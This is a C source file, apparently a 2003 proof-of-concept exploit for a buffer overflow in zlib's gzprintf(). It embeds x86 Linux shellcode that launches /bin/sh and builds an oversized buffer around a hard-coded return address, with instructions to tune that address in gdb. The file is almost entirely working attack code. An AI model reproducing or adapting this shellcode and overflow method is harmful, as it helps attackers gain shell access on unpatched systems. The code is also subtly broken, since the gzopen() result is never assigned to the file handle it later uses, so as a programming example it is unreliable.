/*
 * zlib proof of concept exploit by dcryptr 
 *
 * function() is a simple example
 * function that uses gzprintf()
 * use gdb to get the right ret addy.
 *
 * compile with: gcc -o oC-zlib oC-zlib.c -lz
 *
 * greets: DigitalDj
 *
 * oC-2003 - http://crionized.net/
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <zlib.h>

#define LEN 5040
#define RET 0xbfffe611

/* 33 bytes shellcode by dcryptr */
static char shellcode[] =
  "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62"
  "\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0"
  "\x0b\xcd\x80\x31\xdb\x89\xd8\xb0\x01\xcd\x80";

char function(char *buf);

int main()
{
  int i;
  char buffer[LEN];
  long retaddr = RET;

  fprintf(stderr, "[+] zlib proof-of-concept exploit by dcryptr\n");
  fprintf(stderr, "[+] oC-2003 - http://crionized.net/\n");

  fprintf(stderr, "[+] using retaddr: 0x%lx\n", retaddr);
  fprintf(stderr, "[+] building buffer...\n");
  
  for (i = 0; i < LEN; i += 4)
    *(long *)&buffer[i] = retaddr;

  memcpy(buffer + 1, shellcode, strlen(shellcode));

  fprintf(stderr, "[+] executing vulnerable function\n");
  
  function(buffer);

  return(0);
}

char function(char *buf)
{
  int ret;
  gzFile exploitable;
  char tmp[6000];

  snprintf(tmp, sizeof(tmp), "%s", buf);

  if (!(gzopen("/dev/null", "w"))) {
    perror("gzopen()");
    exit(EXIT_FAILURE);
  }

  ret = gzprintf(exploitable, "%s", buf);
  printf("gzprintf %d\n", ret);

  ret = gzclose(exploitable);
  printf("gzclose %d [%d]\n", ret, errno);

  return(0);
}